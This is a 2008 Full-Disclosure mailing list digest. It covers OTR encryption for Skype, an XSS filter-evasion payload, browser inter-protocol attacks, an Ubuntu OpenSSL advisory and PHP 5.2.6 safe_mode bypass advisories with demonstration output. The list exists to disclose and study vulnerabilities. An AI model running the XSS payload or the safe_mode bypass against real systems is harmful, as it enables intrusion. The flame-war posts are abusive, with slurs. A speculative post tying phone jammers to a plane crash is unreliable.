Re: [Full-disclosure] Skype chat encryption with OTR

[Tonnerre Lombard]

Salut, rawket,

On Thu, 19 Jun 2008 13:00:49 +1000, rawket wrote:
> /There is no denying that an OTR Conversation has been encrypted..
> Its because the private keys change ultra-frequently, and the keys
> are short lived that it provides the 'plausible deniability'

Not exactly. The plausible deniability is due to the fact that the
signature is executed using a symmetric key known to both parties, so
that either party (but noone else) could have sent the message.

Tonnerre
-- 
SyGroup GmbH
Tonnerre Lombard

Solutions Systematiques
Tel:+41 61 333 80 33Güterstrasse 86
Fax:+41 61 383 14 674053 Basel
Web:www.sygroup.ch  [EMAIL PROTECTED]


signature.asc
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Skype chat encryption with OTR

[Fabio Pietrosanti (naif)]

Are you willing to trust skype encryption for your own confidential 
material?

It obviously depend on the risk context and trust scenario.

I would never send any confidential material over a skype chat but only 
over a channel where i have independent control over the information 
encryption.

Would be nice to analyze some approach to make even "voice" of skype 
end-to-end encrypted with an independent encryption module (applying 
zrtp or other crypto technologies), even if this one could be much more 
difficult to be achieved.

Cheers

Fabio/naif


Ureleet wrote:
> isnt skype encrypted anyway?
>   

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Skype chat encryption with OTR

[rawket]

Yeah its encrypted, Public AND Private keys are stored on Skype's server.
Although this is great, and provides the user with an encrypted 
conversation (voice or text) wherever he/she is in the world - it means 
all the keys are stored in 1 location and can be intercepted by either 
Skype or the feds heh...

 >> /end-to-end deniable encryption for Skype chat messages.

/There is no denying that an OTR Conversation has been encrypted.. Its 
because the private keys change ultra-frequently, and the keys are short 
lived that it provides the 'plausible deniability'

Even with OTR, theres no need to send your private conversations through 
skype's servers. You should use OTR with a trusted jabber server.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] xss dot(.) filter evasion

[Andrew Farmer]

On 18 Jun 08, at 08:49, Thomas Pollet wrote:
> I came across this site that implemented some filtering so the dots  
> were
> replaced by an underscore, also the quotes and backslash were escaped.
> I came up with the code below to bypass this filtering (write  
> anything to
> the page using String.fromCharCode)
> Someone knows a different way to do this?

eval makes everything easy. Well, reasonably easy.

eval(unescape(String(/%2a%2a%2falert(%22xss%22);%2f%2a%2a/)));

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Coming soon : Firefox 3 Release overflow

[Ureleet]

is this the "lets set a world record for downloads, oh wait, we forgot
to buy the bandwidth to support that" overflow?

On Tue, Jun 17, 2008 at 10:20 PM, doulcet pierre <[EMAIL PROTECTED]> wrote:
> CRC32 : 898482c7
> MD5   : 801ed54c2ab948472584154ba5bec56e
> SHA-1 : 595ab2d95a433c8973d60245cb2b4d3857838605
> SHA-2 256 : 
> 0c70374063951c9f7eaf26cfe306c1e9773bbd84cb3a1396b3e0b1d633b4498a
>
> Firefox 3 Release, overflow.
>
> --
> [EMAIL PROTECTED]
> Proof-of-Concept.fr
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Skype chat encryption with OTR

[Ureleet]

isnt skype encrypted anyway?

On Wed, Jun 18, 2008 at 5:11 AM, Fabio Pietrosanti (naif)
<[EMAIL PROTECTED]> wrote:
> For all you OS X guys that like skype because of it's usability but are
> concerned about the lacks of and end-to-end message encryption system (a
> plug-in for skype).
>
> Today i tried:
>
> #1 Get and install Adium (I suggest portable adium in a separated
> filevault volume)
>http://www.freesmug.org/portableapps/adium/
>
> #2 Get and install Skype plug-in for Adium
> http://myjobspace.co.nz/images/pidgin/
>
> #3 Enable OTR encryption on Skype chat (trough Adium client)
> http://www.cypherpunks.ca/otr/
>
> Et voilà, end-to-end deniable encryption for Skype chat messages.
>
> The funny thing is that you can see the encrypted chat and key exchange
> on standard Skype messaging window, so you can verify yourself that all
> stuff are enciphered.
>
> Now i feel myself more comfortable and will sleep +10minutes each night.
>
> Cheers
>
> Fabio/naif
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: Comments on: Internet-connected coffee maker has security holes

[Ureleet]

id' love to see n3td3v dos a coffee maker.  hell i'd love to see
n3td3v dos anything.

On Tue, Jun 17, 2008 at 6:14 PM, T Biehn <[EMAIL PROTECTED]> wrote:
> When no one was looking, you brewed forty pots of coffee, You brewed
> 40 pots of coffee. Thats as many as four tens.
> And the Feds know you're terrible.
>
> On Tue, Jun 17, 2008 at 4:31 PM, n3td3v <[EMAIL PROTECTED]> wrote:
>> -- Forwarded message --
>> From: n3td3v <[EMAIL PROTECTED]>
>> Date: Tue, Jun 17, 2008 at 9:27 PM
>> Subject: Comments on: Internet-connected coffee maker has security holes
>> To: n3td3v <[EMAIL PROTECTED]>
>>
>>
>> by n3td3v  June 17, 2008 1:22 PM
>>
>> "This is why connecting everything to the internet is a terrible
>> idea." Yeah but the intelligence services love it, they embrace it.
>> The amount of information being collected over the internet by them
>> has reached an all time high, the intelligence services are in their
>> zone with the information collecting capability that's going on. If
>> the government didn't like everything connected to the internet, there
>> would have been a clamp down long ago, infact the government love the
>> internet and hope everything can be internet connected soon. GCHQ and
>> NSA will need to build bigger data warehouses to store everything, but
>> thats not a draw back for them its an investment when you start to see
>> the amount of searchable data being collected about everyone and
>> stored on the intelligence services databases that top spies can
>> access from anywhere in the world just like consumers can with Google
>> search, accept the intelligence services searches don't come up with
>> the next train to catch, they come up with the next terrorist to catch
>> instead. All the best, n3td3v
>>
>> http://news.cnet.com/8601-10784_3-9970757.html?communityId=2066&targetCommunityId=2066&messageId=741397#741397
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Joel Esler comment on Sans ISC podcast

[Ureleet]

joel -- i told u not to respond, you didnt listen, damn it..  i dont
know how much you know about n3td3v, but he tries to make his own name
off of other pplz fame and work.  take web application security day.
take the day he went off on hd moore.  take any day, ever.  hes just
jumping on your coattails and riding you for all you are worth now.
fukin ignore him.

n3td3v -- you fuckin douche, get a job.  quit trying to ride joels
dick like you tried to ride everyone elses on your little web
application day (oh by the way, how did that go for you?), or hd
moores dick.  you dont work for anyone, you dont know shit, you are
plainly ranting about whatever and whoever.  find some REAL security
issues to talk about, and we will gladly participate with you.  mi5
doesnt care.  you suck.  go hang.

On Wed, Jun 18, 2008 at 4:26 PM, n3td3v <[EMAIL PROTECTED]> wrote:
> On Wed, Jun 18, 2008 at 5:56 PM, Joel Esler <[EMAIL PROTECTED]> wrote:
>> On Jun 18, 2008, at 12:26 PM, n3td3v wrote:
>>
>> Joel Esler said he doesn't switch his phone off on flights and that
>> anyone who is on a plane with him should watch out.
>>
>> First of all, I said "before I got the iPhone with the 'airplane' mode"  I'd
>> forget to turn off my phone alot, i'd throw it in my briefcase when I'd go
>> through security, and forget it's in there.  Heck I've seen people actually
>> been able to receive calls on their crackberries while in mid flight.  Not
>> that they answered them.  But I've seen the phones ring.  I have an iPhone
>> now, I place it in airplane mode when I get on a flight.
>
> Why did you tell people to be careful when you're on a flight? Does
> that mean you're planning to fly again with your device turned on and
> that you suspect it will mess with the planes electronics?
>
>> There are actually studies going on RIGHT NOW to see if phones can be
>> allowed to be used during flights by the FCC/FAA, and in other countries as
>> well.
>
> I hope they consider this incident before making up their mind...
>
> They (experts) suspect a radio frequency messed with the electronics,
> one that was being used by MI5 to block mobile phone signals.
>
> "An offical probe into the Heathrow crash has focused on the high-tech
> jamming device which shields Gordon Brown from terrorist attack.
>
> When the Boeing 777 crashed on January 17 it passed just feet above
> the Prime Minister's official car as he was driven to the airport to
> board a flight to Beijing.
>
> Inside the car is a jammer which broadcasts radio signals 100 times
> more powerful than a mobile phone.
>
> The device is designed to block signals which MI5 say terrorists use
> to blow up remote-control bombs."
>
> http://www.sundaymirror.co.uk/news/sunday/2008/04/27/gordon-bown-in-a-jam-98487-20396286/
>
> "WASHINGTON — A total electronics failure reportedly occurred before
> the crash of a British Airways 777 at London's Heathrow Airport on
> Thursday (Jan. 17).
> All 136 passengers and 16 crew members escaped from the British
> Airways flight from Beijing. The BBC reported that 13 passengers were
> injured.
>
> An airport worker told the BBC that the pilot of the Boeing 777 lost
> all power, and had to glide the plane to a landing. The plane's
> landing gear collapsed after crash landing.
>
> The BBC said the airport worker was told by the pilot that all
> aircraft electronics had failed and that the crew had no warning of a
> problem. "It just went," the worker was quoted as saying. "It's a
> miracle. The [pilot] deserves a medal as big as a frying pan."
>
> http://www.eetimes.com/news/latest/showArticle.jhtml?articleID=205900406
>
> "Computer glitch:This happened with a Malaysian Airlines 777 and a
> former 777 captain told The Sunday Times that for both engines to fail
> at the same time "it has got to be commanded" - ie, it was computer
> error in controlling the engines. Verdict: possible and many experts'
> prime concern "
>
> http://www.timesonline.co.uk/tol/news/uk/article3216746.ece
>
> "The British Airways plane that crash landed at Heathrow today was a
> Boeing 777 - currently regarded as the safest aeroplane in the world
> by aviation experts.
>
> The plane has only been in use for seven years and is the first
> aircraft of its kind to have been designed by computers and boasts the
> latest "avionic and navigational systems".
>
> The Boeing 777 has a number of variant models - such as the 777-200ER
> and 777-300ER - but all the models being flown around the world
> currently have a clean safety record."
>
> http://www.dailymail.co.uk/news/article-508869/Boeing-777-crash-landed-Heathrow-safest-aeroplanes-world-say-experts.html
>
>> Personally I hope this doesn't go through, as I don't want to be sitting
>> next to some dude during my 100,000+ miles I fly a year to hear yacking the
>> whole flight.
>>
>
> I'd be more concerned about terrorists using the phone to trigger some
> kind of security vulnerability with the planes electronics than having
> my sleep disturbed by a s

[Full-disclosure] Fwd: fag

[Ureleet]

what a serious researcher.


-- Forwarded message --
From: n3td3v <[EMAIL PROTECTED]>
Date: Wed, Jun 18, 2008 at 5:48 PM
Subject: fag
To: Ureleet <[EMAIL PROTECTED]>


you're such a wee pubic hair that no one is listening to and who i
won't respond to in public mailing lists anymore.

your hay day is over cock sucker, you ain't getting anymore public
responses from me.

all the best,

n3td3v

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] The Extended HTML Form attack revisited

[kuza55]

Hi,

Just thought I'd let you know that Wade Alcorn wrote a similar paper
in 2006: http://www.bindshell.net/papers/ipc (Using IMAP3 too), but of
course things have changed since then (namely this attack not working
against Firefox 2 or 3).

Also, there is a complete list of ports that Firefox blocks here:
http://www.mozilla.org/projects/netlib/PortBanning.html (which Wade's
paper references), and the default protocol handlers which can speak
to the blocked ports. Do you know if there's a list of ports published
by Microsoft/Opera/Apple about which ports are blocked in their
browsers? If not, would you be able to publish the ports you found
blocked in an appendix (I'm sure it wouldn't be too much code to whip
up to test it, but if you've already done so then there's no point in
duplicating work)?

I also did some digging myself and found that the reason Firefox
doesn't render the response as HTML is because it searches for the
string "http" (case-insensitive, no quotes) in the first 8 bytes of
the response; if you can satisfy that condition somehow then you can
still get it to happen, but of course that seems pretty unlikely.

IE also tries to search for a string, in this case "http/"
(case-insensitive, no quotes) in the first 1024 bytes, but only so
that it can identify http headers, so if you can inject data into the
first 1024 bytes of the response you can inject headers to do cache
poisoning, etc. (You can probably do header injection against Firefox
if you can trigger this, but the problem is of course triggering it on
FIrefox)

 - kuza55

2008/6/19 Sandro Gauci <[EMAIL PROTECTED]>:
> Hi -
>
> Back in 2002 I had published details of a vulnerability affecting most
> web browsers. It detailed a security flaw that allows attackers to
> abuse non-HTTP protocols to launch Cross Site Scripting attacks even
> when a target web application was not vulnerable to XSS.
>
> Six years later I'm releasing an update to this research in this
> paper. This security vulnerability still affects popular web browsers
> nowadays and the following browsers were tested as vulnerable:
>
>   * Internet Explorer 6
>   * Internet Explorer 7
>   * Internet Explorer 8 (beta 1)
>   * Opera 9.27
>   * Opera 9.50
>   * Safari 1.32
>   * Safari 3.1.1
>
> Others have described how to abuse behavior for purposes other than
> Cross Site Scripting. NGSSoftware previously published a paper called
> "Inter-Protocol Exploitation" which references the original EyeonSecurity 
> paper.
>
> Paper at:
> http://resources.enablesecurity.com/resources/the%20extended%20html%20form%20attack%20revisited.pdf
>
> or http://tinyurl.com/5d88ll
>
> --
> Sandro Gauci
> EnableSecurity
> Web: http://enablesecurity.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [USN-612-11] openssl-blacklist update

[Jamie Strandboge]

=== 
Ubuntu Security Notice USN-612-11  June 18, 2008
openssl-blacklist update
http://www.ubuntu.com/usn/usn-612-1
http://www.ubuntu.com/usn/usn-612-3
http://www.ubuntu.com/usn/usn-612-8
http://www.ubuntu.com/usn/usn-612-9
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.04
Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  openssl-blacklist   0.3.3+0.4-0ubuntu0.6.06.2
  openssl-blacklist-extra 0.3.3+0.4-0ubuntu0.6.06.2

Ubuntu 7.04:
  openssl-blacklist   0.3.3+0.4-0ubuntu0.7.04.2
  openssl-blacklist-extra 0.3.3+0.4-0ubuntu0.7.04.2

Ubuntu 7.10:
  openssl-blacklist   0.3.3+0.4-0ubuntu0.7.10.2
  openssl-blacklist-extra 0.3.3+0.4-0ubuntu0.7.10.2

Ubuntu 8.04 LTS:
  openssl-blacklist   0.3.3+0.4-0ubuntu0.8.04.3
  openssl-blacklist-extra 0.3.3+0.4-0ubuntu0.8.04.3

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

USN-612-3 addressed a weakness in OpenSSL certificate and key
generation and introduced openssl-blacklist to aid in detecting
vulnerable certificates and keys. This update adds RSA-4096
blacklists to the openssl-blacklist-extra package and adjusts
openssl-vulnkey to properly handle RSA-4096 and higher moduli.

Original advisory details:
 A weakness has been discovered in the random number generator used
 by OpenSSL on Debian and Ubuntu systems. As a result of this
 weakness, certain encryption keys are much more common than they
 should be, such that an attacker could guess the key through a
 brute-force attack given minimal knowledge of the system. This
 particularly affects the use of encryption keys in OpenSSH, OpenVPN
 and SSL certificates.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.6.06.2.dsc
  Size/MD5:  676 ec900c22df66e7da2543082d7123aed7

http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.6.06.2.tar.gz
  Size/MD5: 32928890 ff8a69186860a3c9bc78c86b51993154

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist-extra_0.3.3+0.4-0ubuntu0.6.06.2_all.deb
  Size/MD5:  6317974 c71f0e9dfaf87712672fb52acb55db0d

http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.6.06.2_all.deb
  Size/MD5:  6333018 e43b4ea20935655041e803064cee6626

Updated packages for Ubuntu 7.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.04.2.dsc
  Size/MD5:  812 71e900154130bd20b4401b6ac2653cdc

http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.04.2.tar.gz
  Size/MD5: 32928996 37d24b96159aca653515a8aa136f31d3

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist-extra_0.3.3+0.4-0ubuntu0.7.04.2_all.deb
  Size/MD5:  6318082 cc4e2c235c71d36653ce1c2ef1b247bc

http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.04.2_all.deb
  Size/MD5:  6332858 d805a05a0bc674c064256cf26f231881

Updated packages for Ubuntu 7.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.10.2.dsc
  Size/MD5:  812 b62d9f57a2c6f4e3e671a3d9648b1df1

http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.10.2.tar.gz
  Size/MD5: 32928995 8717c32922e43aaaf7203ccd268b99a8

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist-extra_0.3.3+0.4-0ubuntu0.7.10.2_all.deb
  Size/MD5:  6318232 81e856d987468e3fc3a0d6e7e21bf532

http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.10.2_all.deb
  Size/MD5:  6332724 84087c5b3d5a05cf55d415adaf6974f1

Updated packages for Ubuntu 8.04 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.8.04.3.dsc
  Size/MD5:  943 c1d37d2d4a36ba178022fc27ff6a0bdc

http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.8.04.3.tar.gz
  Size/MD5: 32929040 376d57551e6859b39c2e795284978233

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/o/open

Re: [Full-disclosure] Joel Esler comment on Sans ISC podcast

[n3td3v]

On Wed, Jun 18, 2008 at 5:56 PM, Joel Esler <[EMAIL PROTECTED]> wrote:
> On Jun 18, 2008, at 12:26 PM, n3td3v wrote:
>
> Joel Esler said he doesn't switch his phone off on flights and that
> anyone who is on a plane with him should watch out.
>
> First of all, I said "before I got the iPhone with the 'airplane' mode"  I'd
> forget to turn off my phone alot, i'd throw it in my briefcase when I'd go
> through security, and forget it's in there.  Heck I've seen people actually
> been able to receive calls on their crackberries while in mid flight.  Not
> that they answered them.  But I've seen the phones ring.  I have an iPhone
> now, I place it in airplane mode when I get on a flight.

Why did you tell people to be careful when you're on a flight? Does
that mean you're planning to fly again with your device turned on and
that you suspect it will mess with the planes electronics?

> There are actually studies going on RIGHT NOW to see if phones can be
> allowed to be used during flights by the FCC/FAA, and in other countries as
> well.

I hope they consider this incident before making up their mind...

They (experts) suspect a radio frequency messed with the electronics,
one that was being used by MI5 to block mobile phone signals.

"An offical probe into the Heathrow crash has focused on the high-tech
jamming device which shields Gordon Brown from terrorist attack.

When the Boeing 777 crashed on January 17 it passed just feet above
the Prime Minister's official car as he was driven to the airport to
board a flight to Beijing.

Inside the car is a jammer which broadcasts radio signals 100 times
more powerful than a mobile phone.

The device is designed to block signals which MI5 say terrorists use
to blow up remote-control bombs."

http://www.sundaymirror.co.uk/news/sunday/2008/04/27/gordon-bown-in-a-jam-98487-20396286/

"WASHINGTON — A total electronics failure reportedly occurred before
the crash of a British Airways 777 at London's Heathrow Airport on
Thursday (Jan. 17).
All 136 passengers and 16 crew members escaped from the British
Airways flight from Beijing. The BBC reported that 13 passengers were
injured.

An airport worker told the BBC that the pilot of the Boeing 777 lost
all power, and had to glide the plane to a landing. The plane's
landing gear collapsed after crash landing.

The BBC said the airport worker was told by the pilot that all
aircraft electronics had failed and that the crew had no warning of a
problem. "It just went," the worker was quoted as saying. "It's a
miracle. The [pilot] deserves a medal as big as a frying pan."

http://www.eetimes.com/news/latest/showArticle.jhtml?articleID=205900406

"Computer glitch:This happened with a Malaysian Airlines 777 and a
former 777 captain told The Sunday Times that for both engines to fail
at the same time "it has got to be commanded" - ie, it was computer
error in controlling the engines. Verdict: possible and many experts'
prime concern "

http://www.timesonline.co.uk/tol/news/uk/article3216746.ece

"The British Airways plane that crash landed at Heathrow today was a
Boeing 777 - currently regarded as the safest aeroplane in the world
by aviation experts.

The plane has only been in use for seven years and is the first
aircraft of its kind to have been designed by computers and boasts the
latest "avionic and navigational systems".

The Boeing 777 has a number of variant models - such as the 777-200ER
and 777-300ER - but all the models being flown around the world
currently have a clean safety record."

http://www.dailymail.co.uk/news/article-508869/Boeing-777-crash-landed-Heathrow-safest-aeroplanes-world-say-experts.html

> Personally I hope this doesn't go through, as I don't want to be sitting
> next to some dude during my 100,000+ miles I fly a year to hear yacking the
> whole flight.
>

I'd be more concerned about terrorists using the phone to trigger some
kind of security vulnerability with the planes electronics than having
my sleep disturbed by a single mom or retired couple muttering away on
the phone.

I think all gadgets and gizmos should be banned from flights incase of
0-day vulnerabilities that are unknown about and cause a system
failure.

> Is this some kind of dry american humour that i'm missing here or is
> that not even funny?
>
> yes, It was a joke.  Sorry if it was in bad taste.
>

If it was just a joke in a bar then it might be funny, it was a joke
during a Sans internet storm center podcast on a segment about
bluetooth vulnerabilities, and you and your co-workers were just
laughing and a joking like you were in a bar about leaving your phone
on and telling people to be careful if they were on the same flight as
you.

Even if I overheard you telling that joke in a bar I would probably
walk over and question you about it, or possibly just call the police.

If you had made the same joke at the airport terminal and an airport
official overheard you, in Britian you would have been arrested by
anti-terrorism police... I don

[Full-disclosure] spyware in smplayer_portable.exe found in MPUI.2008-06-16.Full-Package.exe ?

[Dr. Mark A. Baiter [Chief Scatological Consultant]]

hi there lord_mulder,

i wanted to report some spyware like behavior about smplayer_portable.exe

i have just downloaded MPUI.2008-06-16.Full-Package.exe from
http://mulder.dummwiedeutsch.de/home/?page=projects#mplayer
and installed it completely - codecs + mplayer + smplayer

on running smplayer_portable.exe it tries to connect to the internet
in this host rautemusik.g24m.net without me opening any file like
internet radio station or anything else

is this behavior normal ? if yes then please tell me what data is
rautemusik.g24m.net gathering from my computer ?
please investigate this - perhaps the smplayer_portable.exe that you
got is infected with some kind of spyware
can you please tell me where did you get your version of
smplayer_portable.exe that you included in
MPUI.2008-06-16.Full-Package.exe  ?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] PHP 5.2.6 chdir(), ftok() (standard ext) safe_mode bypass

[Maksymilian Arciemowicz]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass ]

Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- - Written: 10.05.2008
- - Public: 17.06.2008

SecurityReason Research
SecurityAlert Id: 55

CVE: CVE-2008-2666
CWE: CWE-264
SecurityRisk: Medium

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/55
Vendor: http://www.php.net

- --- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from 
C, Java and Perl with a couple of unique PHP-specific features thrown in. The 
goal of the language is to allow web developers to write dynamically generated 
pages quickly.

chdir ? Change directory

SYNOPSIS:

bool chdir  ( string $directory  )

http://pl.php.net/manual/en/function.chdir.php


ftok ? Convert a pathname and a project identifier to a System V IPC key

SYNOPSIS:

int ftok  ( string $pathname  , string $proj  )

http://pl.php.net/manual/en/function.ftok.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL 
NOT LIST ALL VULNERABLE FUNCTIONS

- --- 1. chdir(), ftok() (from standard ext) and more safe_mode bypass ---
Let's see to chdir() function 

- ---
PHP_FUNCTION(chdir)
{
char *str;
int ret, str_len;

if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, 
&str_len) == FAILURE) {
RETURN_FALSE;
}

if ((PG(safe_mode) && !php_checkuid(str, NULL, 
CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)) {
RETURN_FALSE;
}
ret = VCWD_CHDIR(str);

if (ret != 0) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s (errno %d)", 
strerror(errno), errno);
RETURN_FALSE;
}

RETURN_TRUE;
}
- ---

str is beeing checked by safe_mode
example:

- ---
Warning: chdir(): SAFE MODE Restriction in effect.  The script whose uid is 80 
is not allowed to access / owned by uid 0 in /www/mb/mb.php on line 8
- ---

in current directory, we should create subdir "http:". => it is possible to 
create chdir("http://../../../../../../";)
and we are in /

Why?

TRUE==((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) 
|| php_check_open_basedir(str TSRMLS_CC)))

for
str="http://../../../../../../";

safe_mode will ignore all paths with http://

that same situation with ftok() function (and more)

- ---EXAMPLE1---
cxib# cat /www/wufff.php

cxib# ls -la /www/wufff.php
- -rw-r--r--  1 www  www  62 Jun 17 17:14 /www/wufff.php
cxib# php /www/wufff.php
/www

Warning: chdir(): SAFE MODE Restriction in effect.  The script whose uid is 80 
is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on line 3
/www
cxib#
- ---/EXAMPLE1---

- ---EXAMPLE2---
cxib# ls -la /www/wufff.php
- -rw-r--r--  1 www  www  74 Jun 17 17:13 /www/wufff.php
cxib# ls -la /www/http:
total 8
drwxr-xr-x   2 www  www   512 Jun 17 17:12 .
drwxr-xr-x  19 www  www  4608 Jun 17 17:13 ..
cxib# cat /www/wufff.php
http://../../etc/";);
echo getcwd()."\n";
?>
cxib# php /www/wufff.php
/www
/etc
cxib#
- ---/EXAMPLE2---

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL 
NOT LISTS ALL VULNERABLE FUNCTIONS

- --- 2. How to fix ---
Do not use safe_mode as a main safety

- --- 3. Greets ---
sp3x Infospec schain p_e_a Chujwamwdupe

- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.4 (FreeBSD)

iD8DBQFIWCCbW1OhNJH6DMURAsNnAJsEVuvHigC9EZfcg0hhFtlXJsaCMQCgl0w9
W6fcb5TR6GxN9osji+wQCqM=
=tyyL
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] PHP 5.2.6 posix_access() (posix ext) safe_mode bypass

[Maksymilian Arciemowicz]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[PHP 5.2.6 posix_access() (posix ext) safe_mode bypass ]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason.com
Date:
- - Written: 10.05.2008
- - Public: 17.06.2008

SecurityReason Research
SecurityAlert Id: 54

CVE: CVE-2008-2665
CWE: CWE-264
SecurityRisk: Low

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/54
Vendor: http://www.php.net

- --- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from 
C, Java and Perl with a couple of unique PHP-specific features thrown in. The 
goal of the language is to allow web developers to write dynamically generated 
pages quickly.

posix_access ? Determine accessibility of a file

SYNOPSIS:

bool posix_access  ( string $file  [, int $mode  ] )

http://pl2.php.net/manual/pl/function.posix-access.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL 
NOT LIST ALL VULNERABLE FUNCTIONS

- --- 1. PHP 5.2.6 posix_access() safe_mode bypass ---
Let's see to posix_access() function

- ---
PHP_FUNCTION(posix_access)
{
long mode = 0;
int filename_len, ret;
char *filename, *path;

if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|l", &filename, 
&filename_len, &mode) == FAILURE) {
RETURN_FALSE;
}

path = expand_filepath(filename, NULL TSRMLS_CC);

if (!path) {
POSIX_G(last_error) = EIO;
RETURN_FALSE;
}

if (php_check_open_basedir_ex(path, 0 TSRMLS_CC) ||
(PG(safe_mode) && (!php_checkuid_ex(filename, NULL, 
CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS {
efree(path);
POSIX_G(last_error) = EPERM;
RETURN_FALSE;
}

ret = access(path, mode);
efree(path);

if (ret) {
POSIX_G(last_error) = errno;
RETURN_FALSE;
}

